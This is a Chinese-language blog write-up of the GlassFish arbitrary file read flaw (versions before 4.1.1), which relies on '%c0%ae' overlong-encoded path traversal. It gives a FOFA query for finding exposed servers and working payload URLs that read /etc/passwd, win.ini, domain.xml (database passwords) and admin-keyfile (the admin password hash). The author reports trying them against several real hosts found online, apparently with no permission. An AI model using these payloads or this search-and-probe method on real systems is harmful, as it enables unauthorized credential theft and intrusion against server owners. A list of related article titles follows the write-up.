glassfish任意文件读取漏洞
glassfish任意文件读取漏洞
- 1.简介
- 1.1.漏洞类型
- 1.2.漏洞成因
- 1.3.语法搜索
- 1.4.影响版本
- 2.漏洞复现
- 2.1.POC
- 2.2.访问地址
- 2.3.GlassFish的敏感目录
- 2.3.1.获取数据库密码
- 2.3.2.获取GlassFish的后台密码
- 2.4.POC脚本
1.简介
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。
1.1.漏洞类型
任意文件读取:可以利用此漏洞读取到受害机的任意文件。
1.2.漏洞成因
GlassFish 漏洞成因: java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。
1.3.语法搜索
FOFA:“GlassFish” && port=“4848”
1.4.影响版本
GlassFish< 4.1.1(不含 4.1.1)
2.漏洞复现
这里直接使用fofa语法进行搜索,这里是发现一个国外的地址,需要注意的是看版本,版本不要搞错了。
2.1.POC
Windows:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
Linux:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
需要注意的是后面跟着的路径是有所不同的,比如Linux系统使用是的/ect/passwd而Windows则是/windows/win.ini。当然这个路径也可以替换,并非一定使用这个路径。
2.2.访问地址
https://IP地址:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
2.3.GlassFish的敏感目录
domains/domain1/config/domain.xml 各种数据库密码位置
domains/domain1/config/admin-keyfile 后台密码存储位置
2.3.1.获取数据库密码
https://IP地址:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config/domain.xml
2.3.2.获取GlassFish的后台密码
https://IP地址:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config/admin-keyfile
这里得出的密码是以sha256的密文加密的方式,需要再相关的平台进行解密,我找了半天也没找到相关的解密办法,同时也未解码成功。
2.4.POC脚本
脚本地址:POC脚本
这个脚本用法上面都有介绍,我这边从fofa中找了几个手动测试了一下,以及使用脚本测试了一下,没搞懂,手动测试是存在的,但是脚本测试好像是没检测到。不知道是不是存在一些误差。
glassfish任意文件读取漏洞相关推荐
- 应用服务器Glassfish任意文件读取漏洞
catalogue 1. 前言和技术背景 2. Glassfish安装配置 3. 漏洞利用 4. 漏洞缓解(修复) 1. 前言和技术背景 0x1: GlassFish是什么 GlassFish 是用于 ...
- GlassFish 任意文件读取
一. 漏洞描述 glassfish是一款java编写的跨平台的开源的应用服务器.2015年10月,被爆出通用任意文件读取漏洞.利用这个漏洞,攻击者可读取服务器上任意文件. 与宽字节SQL注入一致,都是 ...
- php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复
修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...
- 安全研究 | Jenkins 任意文件读取漏洞分析
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...
- .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)
一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...
- gitlab 更新文件_GitLab任意文件读取漏洞公告
2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...
- phpcms前台注入导致任意文件读取漏洞
关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...
- Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...
- php mail执行命令,PHPMailer 命令执行 任意文件读取漏洞利用 【含POC】
PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033 影响版本:PHPMailer< 5.2.18 漏洞级别: 高危 漏洞POC: PHPMa ...
最新文章
- PCB天线无线模组如何布局摆放?
- 【Android UI设计与开发】第05期:引导界面(五)实现应用程序只启动一次引导界面
- ASP.NET网页中RAR、DOC、PDF等文件下载功能实例源代码
- Riding the Fences USACO 3.3 欧拉路径(dfs+floodfill)
- 代理服务器ip地址如何获得_详细教程:如何使用代理服务器进行网页抓取?
- 认证考试介绍之RHCE篇
- Javascript 获取和设置日期
- VS Code 的常用快捷键
- java编译命令带参数_java编译命令基础知识点
- c 通过jni调用java_使用c通过jni调用java
- 20.Yii 工作流
- qtp java_QTP Java swing 一些控件的遍历
- android设置闹钟组件,Android 设置系统闹钟
- JS 获取中国、各省、各市、各区的边界经纬度点集
- Unity中Combined Mesh (root: scene)的解决方法
- 【前端】【请求】什么是websocket?
- 电影点评系统论文java_java电影在线定制影评管理系统
- Mac上好用的连接服务器的工具(Termius)
- 冷战 (并查集按秩归并)
- 【三维目标检测】Second 模型 (一)